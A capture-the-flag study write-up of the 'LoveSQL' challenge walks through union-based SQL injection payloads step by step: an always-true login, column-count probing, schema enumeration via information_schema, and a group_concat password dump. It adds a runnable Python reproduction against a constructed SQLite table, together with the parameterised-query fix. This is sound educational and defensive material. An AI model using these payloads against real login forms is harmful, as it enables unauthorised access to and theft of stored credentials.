CTF study notes - LoveSQL

1. [Geek Challenge 2019] LoveSQL

1. Topic


2. Problem solving steps

The challenge title hints at sqlmap, so let's start with the usual routine.
Next, try other SQL statements by hand. The classic "universal password" payload 1' or 1=1 # goes through first... a wonderful-looking string comes out, but when I submitted it, it was not the flag. Next, try a query.

Try a union query: 1' union select 1#

Change the approach (I was guessing blindly here; I didn't expect it to work).
Hmm? This one went straight through and echoed 2 and 3, which should be the columns being dumped. Next, check how many columns there are in total.
From this we can see that there are four fields in total. Then check the database name with 1' union select 1,database(),3#
We see that the database name is geek. Continue with the query 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='geek',3#
(This payload is copied from the master's writeup. The group_concat() function concatenates the values in each group produced by GROUP BY and returns them as a single string. information_schema is the built-in database that describes the server's own databases, and information_schema.tables where table_schema='geek' selects the rows describing the tables of the geek database.)
This errors out... Looking at the writeup again, it says to put the query in position 3: 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#
We can see that there are two tables; continue with 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek'#
Here id, username and password should be the columns.
The database, table and columns are all known. Here the master simply guessed that the password is in the l0ve1ysq1 table... call it expert intuition.
Construct 1' union select 1,2,group_concat(password) from l0ve1ysq1 #
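The whole chain above (always-true login, column-count probing, union dump) reproduced as an added example that is not code from the original post, against an in-memory SQLite database so it runs offline, next to the parameterised query that closes the hole. The table name l0ve1ysq1 and its columns id, username, password come from the writeup; the rows are constructed. SQLite has no MySQL-style `#` comment, so the payloads end with `-- ` instead of `#`; the function names and the login-style query are assumptions about what the challenge backend does.

```python
# Added example (not code from the original post): the union-based injection the
# writeup walks through, reproduced against an in-memory SQLite database, next to
# the parameterised query that closes the hole.
#
# Assumptions: the table l0ve1ysq1 with columns id, username, password is taken
# from the writeup; its rows are constructed. SQLite has no MySQL-style '#'
# comment, so the payloads end with '-- ' instead of '#'.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema mirroring the columns named in the writeup."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE l0ve1ysq1 (id INTEGER, username TEXT, password TEXT);
        INSERT INTO l0ve1ysq1 VALUES (1, 'admin', 'constructed_secret_1');
        INSERT INTO l0ve1ysq1 VALUES (2, 'guest', 'constructed_secret_2');
        """
    )
    return conn


def login_vulnerable(conn, username, password):
    """The bug behind the challenge: user input spliced into the SQL text."""
    sql = (
        "SELECT id, username, password FROM l0ve1ysq1 "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """The fix: bound parameters. The input stays data and is never parsed as SQL."""
    sql = "SELECT id, username, password FROM l0ve1ysq1 WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


def probe_column_count(conn, max_cols=8):
    """The writeup's step of adding columns until UNION stops erroring.

    SQLite, like MySQL, rejects a UNION whose two sides differ in column
    count, so the error itself leaks how many columns the original SELECT
    returns. Returns that count, or None if max_cols is exceeded.
    """
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            login_vulnerable(conn, f"1' union select {cols} -- ", "x")
            return n
        except sqlite3.OperationalError:
            continue
    return None


# The writeup's payloads, with '#' replaced by the SQLite comment '-- '.
ALWAYS_TRUE = "1' or 1=1 -- "
DUMP_PASSWORDS = "1' union select 1,2,group_concat(password) from l0ve1ysq1 -- "


if __name__ == "__main__":
    db = make_db()
    print("normal login:    ", login_vulnerable(db, "admin", "constructed_secret_1"))
    print("always-true:     ", login_vulnerable(db, ALWAYS_TRUE, "x"))
    print("column count:    ", probe_column_count(db))
    print("union dump:      ", login_vulnerable(db, DUMP_PASSWORDS, "x"))
    print("safe, same input:", login_safe(db, DUMP_PASSWORDS, "x"))
```

Two things worth noticing when running it: the union dump returns a single row whose third column is every password joined by commas, which is exactly the echo the writeup reads the flag from, and the same payloads handed to login_safe return an empty result because the driver sends them as bound values rather than splicing them into the statement. The column-count probe also shows why raw database errors should never reach the client: the error message is the signal that tells the prober when the column count is right.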

3. Summary
  1. This is the first time I have done a union query challenge; I basically followed the master's writeup and learned how to construct a union query payload.
  2. sqlmap also tested union queries, but it is not clear to me why no error was reported.
  3. There are too many SQL statements, so I need to put together a collection of SQL vulnerabilities and functions later.
  4. I didn't understand the 2 and 3 at the end of the union query. The master said they are the injection points; I thought at first they were field names, but they aren't.
4. References

Origin blog.csdn.net/Obs_cure/article/details/108440565